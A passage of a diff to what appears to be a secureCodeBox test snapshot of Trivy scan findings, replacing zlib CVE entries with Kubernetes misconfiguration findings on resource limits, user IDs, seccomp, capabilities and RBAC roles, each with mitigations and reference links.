"https://nvd.nist.gov/vuln/detail/CVE-2022-37434", + "value": "https://avd.aquasec.com/misconfig/ksv014", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20220901-0005/", + "value": "https://kubesec.io/basics/containers-securitycontext-readonlyrootfilesystem-true/", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'Job/scan-trivy-k8s-kvmnm' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV015", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://cloud.google.com/blog/products/containers-kubernetes/kubernetes-best-practices-resource-requests-and-limits", + "https://avd.aquasec.com/misconfig/ksv015", + ], + }, + "category": "Misconfiguration", + "description": "When containers have resource requests specified, the scheduler can make better decisions about which nodes to place pods on, and how to deal with resource contention.", + "location": "scb://trivy/?Namespace=integration-tests&Kind=Job&Name=scan-trivy-k8s-kvmnm", + "mitigation": "Set 'containers[].resources.requests.cpu'.", + "name": "CPU requests not specified(Container 'trivy' of Job 'scan-trivy-k8s-kvmnm' should set 'resources.requests.cpu')", + "references": [ { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20230427-0007/", + "value": "https://avd.aquasec.com/misconfig/ksv015", }, { "type": "URL", - "value": "https://support.apple.com/kb/HT213488", + "value": "https://cloud.google.com/blog/products/containers-kubernetes/kubernetes-best-practices-resource-requests-and-limits", + }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'Job/scan-trivy-k8s-kvmnm' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV016", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubesec.io/basics/containers-resources-limits-memory/", + "https://avd.aquasec.com/misconfig/ksv016", + ], + }, + "category": "Misconfiguration", + "description": "When containers have memory requests specified, the scheduler can make better decisions about which nodes to place pods on, and how to deal with resource contention.", + "location": "scb://trivy/?Namespace=integration-tests&Kind=Job&Name=scan-trivy-k8s-kvmnm", + "mitigation": "Set 'containers[].resources.requests.memory'.", + "name": "Memory requests not specified(Container 'trivy' of Job 'scan-trivy-k8s-kvmnm' should set 'resources.requests.memory')", + "references": [ + { + "type": "URL", + "value": "https://avd.aquasec.com/misconfig/ksv016", }, { "type": "URL", - "value": "https://support.apple.com/kb/HT213489", + "value": "https://kubesec.io/basics/containers-resources-limits-memory/", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'Job/scan-trivy-k8s-kvmnm' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV018", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubesec.io/basics/containers-resources-limits-memory/", + "https://avd.aquasec.com/misconfig/ksv018", + ], + }, + "category": "Misconfiguration", + "description": "Enforcing memory limits prevents DoS via resource exhaustion.", + "location": "scb://trivy/?Namespace=integration-tests&Kind=Job&Name=scan-trivy-k8s-kvmnm", + "mitigation": "Set a limit value under 'containers[].resources.limits.memory'.", + "name": "Memory not limited(Container 'trivy' of Job 'scan-trivy-k8s-kvmnm' should set 'resources.limits.memory')", + "references": [ { "type": "URL", - "value": "https://support.apple.com/kb/HT213490", + "value": "https://avd.aquasec.com/misconfig/ksv018", }, { "type": "URL", - "value": "https://support.apple.com/kb/HT213491", + "value": "https://kubesec.io/basics/containers-resources-limits-memory/", + }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'Job/scan-trivy-k8s-kvmnm' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV020", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubesec.io/basics/containers-securitycontext-runasuser/", + "https://avd.aquasec.com/misconfig/ksv020", + ], + }, + "category": "Misconfiguration", + "description": "Force the container to run with user ID > 10000 to avoid conflicts with the host’s user table.", + "location": "scb://trivy/?Namespace=integration-tests&Kind=Job&Name=scan-trivy-k8s-kvmnm", + "mitigation": "Set 'containers[].securityContext.runAsUser' to an integer > 10000.", + "name": "Runs with low user ID(Container 'lurker' of Job 'scan-trivy-k8s-kvmnm' should set 'securityContext.runAsUser' > 10000)", + "references": [ + { + "type": "URL", + "value": "https://avd.aquasec.com/misconfig/ksv020", }, { "type": "URL", - "value": "https://support.apple.com/kb/HT213493", + "value": "https://kubesec.io/basics/containers-securitycontext-runasuser/", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'Job/scan-trivy-k8s-kvmnm' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV020", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubesec.io/basics/containers-securitycontext-runasuser/", + "https://avd.aquasec.com/misconfig/ksv020", + ], + }, + "category": "Misconfiguration", + "description": "Force the container to run with user ID > 10000 to avoid conflicts with the host’s user table.", + "location": "scb://trivy/?Namespace=integration-tests&Kind=Job&Name=scan-trivy-k8s-kvmnm", + "mitigation": "Set 'containers[].securityContext.runAsUser' to an integer > 10000.", + "name": "Runs with low user ID(Container 'trivy' of Job 'scan-trivy-k8s-kvmnm' should set 'securityContext.runAsUser' > 10000)", + "references": [ { "type": "URL", - "value": "https://support.apple.com/kb/HT213494", + "value": "https://avd.aquasec.com/misconfig/ksv020", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5570-1", + "value": "https://kubesec.io/basics/containers-securitycontext-runasuser/", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'Job/scan-trivy-k8s-kvmnm' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV021", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubesec.io/basics/containers-securitycontext-runasuser/", + "https://avd.aquasec.com/misconfig/ksv021", + ], + }, + "category": "Misconfiguration", + "description": "Force the container to run with group ID > 10000 to avoid conflicts with the host’s user table.", + "location": "scb://trivy/?Namespace=integration-tests&Kind=Job&Name=scan-trivy-k8s-kvmnm", + "mitigation": "Set 'containers[].securityContext.runAsGroup' to an integer > 10000.", + "name": "Runs with low group ID(Container 'lurker' of Job 'scan-trivy-k8s-kvmnm' should set 'securityContext.runAsGroup' > 10000)", + "references": [ + { + "type": "URL", + "value": "https://avd.aquasec.com/misconfig/ksv021", + }, + { + "type": "URL", + "value": "https://kubesec.io/basics/containers-securitycontext-runasuser/", + }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'Job/scan-trivy-k8s-kvmnm' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV021", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubesec.io/basics/containers-securitycontext-runasuser/", + "https://avd.aquasec.com/misconfig/ksv021", + ], + }, + "category": "Misconfiguration", + "description": "Force the container to run with group ID > 10000 to avoid conflicts with the host’s user table.", + "location": "scb://trivy/?Namespace=integration-tests&Kind=Job&Name=scan-trivy-k8s-kvmnm", + "mitigation": "Set 'containers[].securityContext.runAsGroup' to an integer > 10000.", + "name": "Runs with low group ID(Container 'trivy' of Job 'scan-trivy-k8s-kvmnm' should set 'securityContext.runAsGroup' > 10000)", + "references": [ { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5570-2", + "value": "https://avd.aquasec.com/misconfig/ksv021", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5573-1", + "value": "https://kubesec.io/basics/containers-securitycontext-runasuser/", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'Job/scan-trivy-k8s-kvmnm' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV030", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", + "https://avd.aquasec.com/misconfig/ksv030", + ], + }, + "category": "Misconfiguration", + "description": "The RuntimeDefault/Localhost seccomp profile must be required, or allow specific additional profiles.", + "location": "scb://trivy/?Namespace=integration-tests&Kind=Job&Name=scan-trivy-k8s-kvmnm", + "mitigation": "Set 'spec.securityContext.seccompProfile.type', 'spec.containers[*].securityContext.seccompProfile' and 'spec.initContainers[*].securityContext.seccompProfile' to 'RuntimeDefault' or undefined.", + "name": "Default Seccomp profile not set(Either Pod or Container should set 'securityContext.seccompProfile.type' to 'RuntimeDefault')", + "references": [ { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-37434", + "value": "https://avd.aquasec.com/misconfig/ksv030", }, { "type": "URL", - "value": "https://www.debian.org/security/2022/dsa-5218", + "value": "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", }, ], - "severity": "HIGH", + "severity": "LOW", }, { "attributes": { - "fixedVersion": "1:1.2.11.dfsg-1+deb10u1", - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2018-25032", - "installedVersion": "1:1.2.11.dfsg-1", - "packageName": "zlib1g", + "fixedVersion": undefined, + "foundIn": "Target: 'Job/scan-trivy-k8s-kvmnm' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV030", + "installedVersion": undefined, + "packageName": undefined, "references": [ - "http://seclists.org/fulldisclosure/2022/May/33", - "http://seclists.org/fulldisclosure/2022/May/35", - "http://seclists.org/fulldisclosure/2022/May/38", - "http://www.openwall.com/lists/oss-security/2022/03/25/2", - "http://www.openwall.com/lists/oss-security/2022/03/26/1", - "https://access.redhat.com/errata/RHSA-2022:8420", - "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2018-25032.json", - "https://access.redhat.com/security/cve/CVE-2018-25032", - "https://bugzilla.redhat.com/2067945", - "https://cert-portal.siemens.com/productcert/pdf/ssa-333517.pdf", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-25032", - "https://errata.almalinux.org/9/ALSA-2022-8420.html", - "https://github.com/madler/zlib/commit/5c44459c3b28a9bd3283aaceab7c615f8020c531", - "https://github.com/madler/zlib/compare/v1.2.11...v1.2.12", - "https://github.com/madler/zlib/issues/605", - "https://github.com/sparklemotion/nokogiri/releases/tag/v1.13.4", - "https://github.com/sparklemotion/nokogiri/security/advisories/GHSA-v6gp-9mmm-c6p5", - "https://groups.google.com/g/ruby-security-ann/c/vX7qSjsvWis/m/TJWN4oOKBwAJ", - "https://linux.oracle.com/cve/CVE-2018-25032.html", - "https://linux.oracle.com/errata/ELSA-2022-9565.html", - "https://lists.debian.org/debian-lts-announce/2022/04/msg00000.html", - "https://lists.debian.org/debian-lts-announce/2022/05/msg00008.html", - "https://lists.debian.org/debian-lts-announce/2022/09/msg00023.html", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/DCZFIJBJTZ7CL5QXBFKTQ22Q26VINRUF/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/DF62MVMH3QUGMBDCB3DY2ERQ6EBHTADB/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/JZZPTWRYQULAOL3AW7RZJNVZ2UONXCV4/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/NS2D2GFPFGOJUL4WQ3DUAY7HF4VWQ77F/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/VOKNP2L734AEL47NRYGVZIKEFOUBQY5Y/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/XOKFMSNQ5D5WGMALBNBXU3GE442V74WU/", - "https://nvd.nist.gov/vuln/detail/CVE-2018-25032", - "https://security.gentoo.org/glsa/202210-42", - "https://security.netapp.com/advisory/ntap-20220526-0009/", - "https://security.netapp.com/advisory/ntap-20220729-0004/", - "https://support.apple.com/kb/HT213255", - "https://support.apple.com/kb/HT213256", - "https://support.apple.com/kb/HT213257", - "https://ubuntu.com/security/notices/USN-5355-1", - "https://ubuntu.com/security/notices/USN-5355-2", - "https://ubuntu.com/security/notices/USN-5359-1", - "https://ubuntu.com/security/notices/USN-5359-2", - "https://ubuntu.com/security/notices/USN-5739-1", - "https://www.cve.org/CVERecord?id=CVE-2018-25032", - "https://www.debian.org/security/2022/dsa-5111", - "https://www.openwall.com/lists/oss-security/2022/03/24/1", - "https://www.openwall.com/lists/oss-security/2022/03/28/1", - "https://www.openwall.com/lists/oss-security/2022/03/28/3", - "https://www.oracle.com/security-alerts/cpujul2022.html", + "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", + "https://avd.aquasec.com/misconfig/ksv030", ], }, - "category": "Vulnerability", - "description": "zlib before 1.2.12 allows memory corruption when deflating (i.e., when compressing) if the input has many distant matches.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", - "mitigation": undefined, - "name": "A flaw found in zlib when compressing (not decompressing) certain inputs", + "category": "Misconfiguration", + "description": "The RuntimeDefault/Localhost seccomp profile must be required, or allow specific additional profiles.", + "location": "scb://trivy/?Namespace=integration-tests&Kind=Job&Name=scan-trivy-k8s-kvmnm", + "mitigation": "Set 'spec.securityContext.seccompProfile.type', 'spec.containers[*].securityContext.seccompProfile' and 'spec.initContainers[*].securityContext.seccompProfile' to 'RuntimeDefault' or undefined.", + "name": "Default Seccomp profile not set(Either Pod or Container should set 'securityContext.seccompProfile.type' to 'RuntimeDefault')", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2018-25032", - }, - { - "type": "URL", - "value": "http://seclists.org/fulldisclosure/2022/May/33", + "value": "https://avd.aquasec.com/misconfig/ksv030", }, { "type": "URL", - "value": "http://seclists.org/fulldisclosure/2022/May/35", + "value": "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'Job/scan-trivy-k8s-kvmnm' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV106", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", + "https://avd.aquasec.com/misconfig/ksv106", + ], + }, + "category": "Misconfiguration", + "description": "Containers must drop ALL capabilities, and are only permitted to add back the NET_BIND_SERVICE capability.", + "location": "scb://trivy/?Namespace=integration-tests&Kind=Job&Name=scan-trivy-k8s-kvmnm", + "mitigation": "Set 'spec.containers[*].securityContext.capabilities.drop' to 'ALL' and only add 'NET_BIND_SERVICE' to 'spec.containers[*].securityContext.capabilities.add'.", + "name": "Container capabilities must only include NET_BIND_SERVICE(container should drop all)", + "references": [ { "type": "URL", - "value": "http://seclists.org/fulldisclosure/2022/May/38", + "value": "https://avd.aquasec.com/misconfig/ksv106", }, { "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2022/03/25/2", + "value": "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'Job/scan-trivy-k8s-kvmnm' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV106", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", + "https://avd.aquasec.com/misconfig/ksv106", + ], + }, + "category": "Misconfiguration", + "description": "Containers must drop ALL capabilities, and are only permitted to add back the NET_BIND_SERVICE capability.", + "location": "scb://trivy/?Namespace=integration-tests&Kind=Job&Name=scan-trivy-k8s-kvmnm", + "mitigation": "Set 'spec.containers[*].securityContext.capabilities.drop' to 'ALL' and only add 'NET_BIND_SERVICE' to 'spec.containers[*].securityContext.capabilities.add'.", + "name": "Container capabilities must only include NET_BIND_SERVICE(container should drop all)", + "references": [ { "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2022/03/26/1", + "value": "https://avd.aquasec.com/misconfig/ksv106", }, { "type": "URL", - "value": "https://access.redhat.com/errata/RHSA-2022:8420", + "value": "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'ConfigMap/extension-apiserver-authentication' / Class: 'config' / Type: 'kubernetes'", + "id": "AVD-KSV-0110", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://avd.aquasec.com/misconfig/avd-ksv-0110", + ], + }, + "category": "Misconfiguration", + "description": "Storing sensitive content such as usernames and email addresses in configMaps is unsafe", + "location": "scb://trivy/?Namespace=kube-system&Kind=ConfigMap&Name=extension-apiserver-authentication", + "mitigation": "Remove sensitive content from configMap data value", + "name": "ConfigMap with sensitive content(ConfigMap 'extension-apiserver-authentication' in 'kube-system' namespace stores sensitive contents in key(s) or value(s) '{"requestheader-username-headers"}')", + "references": [ { "type": "URL", - "value": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2018-25032.json", + "value": "https://avd.aquasec.com/misconfig/avd-ksv-0110", }, + ], + "severity": "HIGH", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'Role/system:controller:bootstrap-signer' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV049", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "https://avd.aquasec.com/misconfig/ksv049", + ], + }, + "category": "Misconfiguration", + "description": "Some workloads leverage configmaps to store sensitive data or configuration parameters that affect runtime behavior that can be modified by an attacker or combined with another issue to potentially lead to compromise.", + "location": "scb://trivy/?Namespace=kube-public&Kind=Role&Name=system:controller:bootstrap-signer", + "mitigation": "Remove write permission verbs for resource 'configmaps'", + "name": "Do not allow management of configmaps(Role 'system:controller:bootstrap-signer' should not have access to resource 'configmaps' for verbs ["create", "update", "patch", "delete", "deletecollection", "impersonate", "*"])", + "references": [ { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2018-25032", + "value": "https://avd.aquasec.com/misconfig/ksv049", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2067945", + "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", }, + ], + "severity": "MEDIUM", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'Role/system::leader-locking-kube-controller-manager' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV049", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "https://avd.aquasec.com/misconfig/ksv049", + ], + }, + "category": "Misconfiguration", + "description": "Some workloads leverage configmaps to store sensitive data or configuration parameters that affect runtime behavior that can be modified by an attacker or combined with another issue to potentially lead to compromise.", + "location": "scb://trivy/?Namespace=kube-system&Kind=Role&Name=system::leader-locking-kube-controller-manager", + "mitigation": "Remove write permission verbs for resource 'configmaps'", + "name": "Do not allow management of configmaps(Role 'system::leader-locking-kube-controller-manager' should not have access to resource 'configmaps' for verbs ["create", "update", "patch", "delete", "deletecollection", "impersonate", "*"])", + "references": [ { "type": "URL", - "value": "https://cert-portal.siemens.com/productcert/pdf/ssa-333517.pdf", + "value": "https://avd.aquasec.com/misconfig/ksv049", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-25032", + "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", }, + ], + "severity": "MEDIUM", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'Role/system::leader-locking-kube-scheduler' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV049", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "https://avd.aquasec.com/misconfig/ksv049", + ], + }, + "category": "Misconfiguration", + "description": "Some workloads leverage configmaps to store sensitive data or configuration parameters that affect runtime behavior that can be modified by an attacker or combined with another issue to potentially lead to compromise.", + "location": "scb://trivy/?Namespace=kube-system&Kind=Role&Name=system::leader-locking-kube-scheduler", + "mitigation": "Remove write permission verbs for resource 'configmaps'", + "name": "Do not allow management of configmaps(Role 'system::leader-locking-kube-scheduler' should not have access to resource 'configmaps' for verbs ["create", "update", "patch", "delete", "deletecollection", "impersonate", "*"])", + "references": [ { "type": "URL", - "value": "https://errata.almalinux.org/9/ALSA-2022-8420.html", + "value": "https://avd.aquasec.com/misconfig/ksv049", }, { "type": "URL", - "value": "https://github.com/madler/zlib/commit/5c44459c3b28a9bd3283aaceab7c615f8020c531", + "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", }, + ], + "severity": "MEDIUM", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'Role/system:controller:cloud-provider' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV049", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "https://avd.aquasec.com/misconfig/ksv049", + ], + }, + "category": "Misconfiguration", + "description": "Some workloads leverage configmaps to store sensitive data or configuration parameters that affect runtime behavior that can be modified by an attacker or combined with another issue to potentially lead to compromise.", + "location": "scb://trivy/?Namespace=kube-system&Kind=Role&Name=system:controller:cloud-provider", + "mitigation": "Remove write permission verbs for resource 'configmaps'", + "name": "Do not allow management of configmaps(Role 'system:controller:cloud-provider' should not have access to resource 'configmaps' for verbs ["create", "update", "patch", "delete", "deletecollection", "impersonate", "*"])", + "references": [ { "type": "URL", - "value": "https://github.com/madler/zlib/compare/v1.2.11...v1.2.12", + "value": "https://avd.aquasec.com/misconfig/ksv049", }, { "type": "URL", - "value": "https://github.com/madler/zlib/issues/605", + "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", }, + ], + "severity": "MEDIUM", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'Role/system:controller:bootstrap-signer' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV041", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "https://avd.aquasec.com/misconfig/ksv041", + ], + }, + "category": "Misconfiguration", + "description": "Check whether role permits managing secrets", + "location": "scb://trivy/?Namespace=kube-system&Kind=Role&Name=system:controller:bootstrap-signer", + "mitigation": "Create a role which does not permit to manage secrets if not needed", + "name": "Do not allow management of secrets(Role permits management of secret(s))", + "references": [ { "type": "URL", - "value": "https://github.com/sparklemotion/nokogiri/releases/tag/v1.13.4", + "value": "https://avd.aquasec.com/misconfig/ksv041", }, { "type": "URL", - "value": "https://github.com/sparklemotion/nokogiri/security/advisories/GHSA-v6gp-9mmm-c6p5", + "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", }, + ], + "severity": "HIGH", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'Role/leader-election-role' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV049", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "https://avd.aquasec.com/misconfig/ksv049", + ], + }, + "category": "Misconfiguration", + "description": "Some workloads leverage configmaps to store sensitive data or configuration parameters that affect runtime behavior that can be modified by an attacker or combined with another issue to potentially lead to compromise.", + "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Role&Name=leader-election-role", + "mitigation": "Remove write permission verbs for resource 'configmaps'", + "name": "Do not allow management of configmaps(Role 'leader-election-role' should not have access to resource 'configmaps' for verbs ["create", "update", "patch", "delete", "deletecollection", "impersonate", "*"])", + "references": [ { "type": "URL", - "value": "https://groups.google.com/g/ruby-security-ann/c/vX7qSjsvWis/m/TJWN4oOKBwAJ", + "value": "https://avd.aquasec.com/misconfig/ksv049", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2018-25032.html", + "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", }, + ], + "severity": "MEDIUM", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'Role/system:controller:token-cleaner' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV041", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "https://avd.aquasec.com/misconfig/ksv041", + ], + }, + "category": "Misconfiguration", + "description": "Check whether role permits managing secrets", + "location": "scb://trivy/?Namespace=kube-system&Kind=Role&Name=system:controller:token-cleaner", + "mitigation": "Create a role which does not permit to manage secrets if not needed", + "name": "Do not allow management of secrets(Role permits management of secret(s))", + "references": [ { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2022-9565.html", + "value": "https://avd.aquasec.com/misconfig/ksv041", }, { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2022/04/msg00000.html", + "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", }, + ], + "severity": "HIGH", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'ClusterRole/cluster-admin' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV044", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "https://avd.aquasec.com/misconfig/ksv044", + ], + }, + "category": "Misconfiguration", + "description": "Check whether role permits wildcard verb on wildcard resource", + "location": "scb://trivy/?Kind=ClusterRole&Name=cluster-admin", + "mitigation": "Create a role which does not permit wildcard verb on wildcard resource", + "name": "No wildcard verb and resource roles(Role permits wildcard verb on wildcard resource)", + "references": [ { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2022/05/msg00008.html", + "value": "https://avd.aquasec.com/misconfig/ksv044", }, { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2022/09/msg00023.html", + "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", }, + ], + "severity": "HIGH", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'ClusterRole/cluster-admin' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV046", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "https://avd.aquasec.com/misconfig/ksv046", + ], + }, + "category": "Misconfiguration", + "description": "Check whether role permits specific verb on wildcard resources", + "location": "scb://trivy/?Kind=ClusterRole&Name=cluster-admin", + "mitigation": "Create a role which does not permit specific verb on wildcard resources", + "name": "No wildcard resource roles(Role permits specific verb on wildcard resource)", + "references": [ { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/DCZFIJBJTZ7CL5QXBFKTQ22Q26VINRUF/", + "value": "https://avd.aquasec.com/misconfig/ksv046", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/DF62MVMH3QUGMBDCB3DY2ERQ6EBHTADB/", + "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", }, + ], + "severity": "HIGH", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'ClusterRole/admin' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV041", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "https://avd.aquasec.com/misconfig/ksv041", + ], + }, + "category": "Misconfiguration", + "description": "Check whether role permits managing secrets", + "location": "scb://trivy/?Kind=ClusterRole&Name=admin", + "mitigation": "Create a role which does not permit to manage secrets if not needed", + "name": "Do not allow management of secrets(Role permits management of secret(s))", + "references": [ { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/JZZPTWRYQULAOL3AW7RZJNVZ2UONXCV4/", + "value": "https://avd.aquasec.com/misconfig/ksv041", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/NS2D2GFPFGOJUL4WQ3DUAY7HF4VWQ77F/", + "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", }, + ], + "severity": "HIGH", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'ClusterRole/admin' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV041", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "https://avd.aquasec.com/misconfig/ksv041", + ], + }, + "category": "Misconfiguration", + "description": "Check whether role permits managing secrets", + "location": "scb://trivy/?Kind=ClusterRole&Name=admin", + "mitigation": "Create a role which does not permit to manage secrets if not needed", + "name": "Do not allow management of secrets(Role permits management of secret(s))", + "references": [ { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/VOKNP2L734AEL47NRYGVZIKEFOUBQY5Y/", + "value": "https://avd.aquasec.com/misconfig/ksv041", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/XOKFMSNQ5D5WGMALBNBXU3GE442V74WU/", + "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", }, + ], + "severity": "HIGH", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'ClusterRole/admin' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV048", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "https://avd.aquasec.com/misconfig/ksv048", + ], + }, + "category": "Misconfiguration", + "description": "Check whether role permits update/create of a malicious pod", + "location": "scb://trivy/?Kind=ClusterRole&Name=admin", + "mitigation": "Create a role which does not permit update/create of a malicious pod", + "name": "Do not allow update/create of a malicious pod(Role permits create/update of a malicious pod)", + "references": [ { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2018-25032", + "value": "https://avd.aquasec.com/misconfig/ksv048", }, { "type": "URL", - "value": "https://security.gentoo.org/glsa/202210-42", + "value": 